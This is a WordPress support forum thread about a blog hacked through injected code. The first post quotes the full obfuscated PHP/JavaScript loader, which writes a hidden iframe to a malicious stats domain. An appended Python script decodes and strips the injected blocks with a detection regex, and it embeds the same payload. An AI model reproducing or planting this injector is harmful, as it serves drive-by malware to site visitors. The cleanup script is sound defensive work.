• hi,
    the following script had been inserted to my blog:

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?><?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    after the insertion my website only displayed a white screen and a popup to run ActiveX was appearing. In the bottom left of the browser I was seeing a weird link saying: https://www.wp-stats-php.info/iframe/wp-stats.php
    I opened the source file and I saw that the script is found at the top and the bottom.
    I checked all my theme PHP files and the script was also there, and in my config.php and index.php too, so I deleted the script from every file where it was inserted. The problem was solved.

    NOW THE QUESTION IS HOW WAS THIS SCRIPT INSERTED AND HOW CAN IT BE AVOIDED?

    I am using WordPress 2.5 with the following plugins:
    -scf2-contact-form
    -simplemodal-contact-form-smcf
    -ibox
    -dailytop10

    thanks in advance for any clarification

Viewing 15 replies - 31 through 45 (of 57 total)
  • hahahahhah

    btw, I just realised you finally made it to a dogpile thread… nice going!

    I’ve been keeping up with the upgrades, and read through the security info that was posted and implemented everything that I could to keep things relatively secure. I’m more than just savvy and try to be conscious of possible security issues. I have a test environment at home where I test plugins, themes and upgrades, etc. Though I can’t rule out that it wasn’t my fault, nor the fact that I’m on a shared server. In moving to a new server, I’m installing everything clean and changing all passwords, etc. – but I’m not finished with the setup yet so I have to deal with this issue until I am.

    I would like to think that just because there’s at least one person in this thread who was affected by this that doesn’t seem to have much of a clue and is a bit obnoxious about asking for help, that you aren’t assuming that everyone affected by this is a complete idiot.

    elorgwhee,

    I would like to think that just because there’s at least one person in this thread who was affected by this that doesn’t seem to have much of a clue and is a bit obnoxious about asking for help, that you aren’t assuming that everyone affected by this is a complete idiot.

    I don't assume anything of the kind, and don't mean to diminish the seriousness of any site being hacked. We spend quite a bit of time on these forums, so brevity helps. It is true though, about the unwashed masses.

    Ivovic wrote:

    “easy to build websites with hard to find vulnerabilities”

    I’m surprised the universe didn’t implode when you said that. If it’s easy to build… then surely it’s easier to find the vulnerabilities than if it were HARD to build with it, right?

    Wrong, easy to build does not imply that it’s easy to find vulnerabilities.

    PHP gives you lots of little shortcuts which make it easier to get the functionality you want, but often they also make it easier to do it in a way that allows malicious code-injection.

    What’s your point anyway? You want something absolutely bug-free? Sorry it doesn’t exist.

    Not bug-free, exploit free. There is plenty of software on my server that has never allowed my server to be compromised. PHP has allowed my server to be compromised at least twice!

    The more popular something becomes, the bigger a target it is. You chose wordpress because everyone thinks it’s great. That’s the same reason the hackers are after it.

    Hackers are after it due to the combination of its popularity, and its insecurity. There is plenty of popular and secure software out there.

    Trade ease of use, compatibility and extensibility for obscurity, then we’ll see you on their forum complaining that they don’t have as many nice features as wordpress.

    Useful features and security are not mutually exclusive, that is a lame cop-out. There are plenty of software platforms that are both featureful, popular, and secure. Perhaps if you spent more time away from PHP you’d see that.

    There are plenty of software platforms that are both featureful, popular, and secure.

    Okay, I’ll bite. Name a few. (And please understand: I’m NOT trying to be contentious here. I am actually quite curious to know your response.)

    Whoo’s on first…

    assuming that everyone affected by this is a complete idiot.

    Of course not… A lot of what I’ve posted here addresses concerns which are largely out of your control. There’s no way you can possibly check every line of code for security issues yourself, so at some point you have to trust.

    I love plugin developers because they’re the life of the wordpress community, but I advocate suspicion, because they’re often just hacks like me trying to cobble a solution together. Regardless of that, no amount of suspicion or research will ever guarantee your safety.

    My first post in this thread addressed the issue as seriously as possible with the only course of action available to you right now, which is mopping up aisle 2… and hoping it’s not your favourite plugin that has the issue.

    … the rest of this thread relates to some senseless emotional whining from someone who definitely has *not* been responsible… and the ensuing coping mechanisms we have for that.

    Don’t feel herded into a group you know you’re not a part of. That distinction is obvious to anyone whose opinion counts for anything.

    Okay, I’ll bite. Name a few. (And please understand: I’m NOT trying to be contentious here. I am actually quite curious to know your response.)

    Exploits in Java code are rare, because Java frameworks tend to enforce good security practices (such as maintaining separation between data and code, and automatically escaping strings – something you have to do manually in PHP).

    Getting specific, one Java-based framework I have personal familiarity with is Apache Wicket – and I’m not aware of a single successful exploit of a Wicket-based website.

    Of course, you can write insecure code in any language, the difference is that in Java-based frameworks you really have to do something dumb, but in PHP the obvious way to do many things is insecure by default.

    When an exploit is found in most software packages, it is a genuinely rare thing that people react strongly to. It seems that when an exploit is found in WordPress, it just results in another “ho-hum” point release.

    WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects. It's depressing that expectations are so low around here.

    Wrong, easy to build does not imply that it’s easy to find vulnerabilities.

    Bzzzt… sorry, but that’s a load of crap. Those same shortcuts you speak of, make code easier to follow, and hence easier to debug.

    It’s completely logical that something simpler to understand is automatically simpler to keep track of.

    Useful features and security are not mutually exclusive

    You’re arguing against my words, not against the spirit of what I was saying. That’s a tired old forum tactic that I don’t plan to indulge.

    Having said that, it (again) holds true that the more code you add, the more likely it is that something will go wrong. That's true in all conceivable cases.

    Take your finest example, add another feature, and you’ve increased the likelihood that it will have a bug (and that the bug may be an exploit).

    Not bug-free, exploit free.

    In the conversational sense, exploits are just a kind of bug.

    There is plenty of software on my server that has never allowed my server to be compromised.

    That doesn’t mean the exploits aren’t there. I’ve never seen under your mattress, but that doesn’t mean your sticky copy of equine weekly is a secret.

    WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects

    This I agree with… but not because it’s wordpress. This is an increasing phenomenon.

    I’ve found the prevailing attitude to be quite poor, and the official response from people like Matt that folks should just upgrade and stop whining is less than satisfactory.

    That doesn’t change anything though… and it certainly doesn’t explain your choice to keep using wordpress.

    Find yourself a java-based publishing platform and use it, maybe…

    I’ve used wordpress since the 1.5s and I’ve never had my wordpress hacked… so perhaps I’m not fed up yet. When I am fed up, you’ll know it because I won’t be here anymore.

    WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects.

    Try substituting the word Microsoft or Windows for WordPress in the above statement and you'll find it's true there as well.

    before we get stuck into Windows and MS-bashing, let's take a moment to research the actual statistics for security vulnerabilities in Linux vs Windows (and Firefox vs IE) over the last 8 years.

    I think it's high time we got over Windows 98 and started addressing the reality.

    ..that would be a huge scandal meriting a grovelling apology from those responsible in other software projects.

    Spend some time using phpBB. Most developers of free open-source PHP projects have a similar response.

    Ivovic wrote:

    Bzzzt… sorry, but that’s a load of crap. Those same shortcuts you speak of, make code easier to follow, and hence easier to debug.

    Dude, you don’t know what you are talking about. These ugly kludges may make it easier to write insecure code, but often there is an inverse relationship between ease of writing and ease of reading, just look at Perl. PHP is a horribly designed language, it encourages insecure coding practices, and they don’t even bother to keep the API stable from release to release. In short, PHP is a mess of a programming language.

    You’re arguing against my words, not against the spirit of what I was saying.

    Are you kidding? You are seriously saying that I should ignore what you actually say and try to imagine what you are thinking instead?

    That’s a tired old forum tactic that I don’t plan to indulge.

    A tired old forum tactic called “rational debate”.

    Having said that, it (again) holds true that the more code you add, the more likely it is that something will go wrong. That's true in all conceivable cases.

    That is only true if you assume that all code is equal, but it isn’t. 10 lines of secure code is better than 1 line of insecure code.

    In the conversational sense, exploits are just a kind of bug.

    Yes, and…? If A is a kind of B, that doesn’t mean that A is the same as B.

    That doesn’t mean the exploits aren’t there. I’ve never seen under your mattress, but that doesn’t mean your sticky copy of equine weekly is a secret.

    Now you are just rambling incoherently. Of course there could be unknown exploits in non-PHP apps on my server, the point is that there are two known exploits in the PHP apps, in addition to all the unknown exploits there might be.

    Thanks whooami & Ivovic.

    Between work, I’m still trying to clean this up enough to make it through another week of finishing the testing/configuration on the new server. It traversed my directories and got literally hundreds of files (thousands maybe?). Scripting the cleanup would be a heck of a lot easier, but I’m not confident in my scripting abilities and friends are helping where they can (when they have time). Meanwhile, it’s all manual.
    >_<
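Added example, not code from anyone in this thread: it decodes the character-shifted string inside the script quoted in the first post (each character is shifted up by 2, so subtracting 2 recovers a 1x1 iframe pointing at the domain the poster saw in the status bar) and then finds and strips every copy of that injected block from a file, the scripted cleanup the last post wished for. The infected file content is constructed here as a stand-in; the regex is written against the exact block quoted in the first post.

```python
import re

# One copy of the injected line quoted in the first post; the poster's files
# carried two copies back to back, reproduced below as INJECTED_LINE.
ONE_COPY = (
    r"""<?php echo '<script type="text/javascript">function count(str){var res = "";"""
    r"""for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); """
    r"""res += String.fromCharCode(n - (2)); } return res; }; """
    r"""document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/"""
    r"""uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>"""
)
INJECTED_LINE = ONE_COPY * 2

# Matches one injected block and captures the numeric shift and the encoded
# string handed to count(), with its JS escapes (\") still in place.
PATTERN = re.compile(
    r"""<\?php echo '<script type="text/javascript">function count\(str\).*?"""
    r"""fromCharCode\(n - \((\d+)\)\).*?count\("((?:[^"\\]|\\.)*)"\)\);</script>';\?>""",
    re.DOTALL,
)


def decode_payload(encoded: str, shift: int) -> str:
    """Undo the JS string escaping, then reverse the per-character shift."""
    literal = encoded.replace('\\"', '"')
    return "".join(chr(ord(ch) - shift) for ch in literal)


def scan_source(source: str):
    """Return (decoded payloads found, source with every injected block removed)."""
    payloads = [decode_payload(m.group(2), int(m.group(1)))
                for m in PATTERN.finditer(source)]
    return payloads, PATTERN.sub("", source)


# Constructed stand-in for an infected wp-config.php: injection at the top and
# the bottom, as the poster observed in the theme, config and index files.
SAMPLE_FILE = INJECTED_LINE + "<?php\ndefine('DB_NAME', 'wordpress');\n" + INJECTED_LINE

if __name__ == "__main__":
    found, cleaned = scan_source(SAMPLE_FILE)
    print(f"{len(found)} injected block(s); payload: {found[0]}")
    print(cleaned)
```

Run it over each PHP file's contents instead of SAMPLE_FILE to list what the blocks decode to and write back the cleaned source; anything the regex does not match is left untouched, so a variant with a different shift or wrapper still needs eyes on it.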

  • The topic ‘got hacked’ is closed to new replies.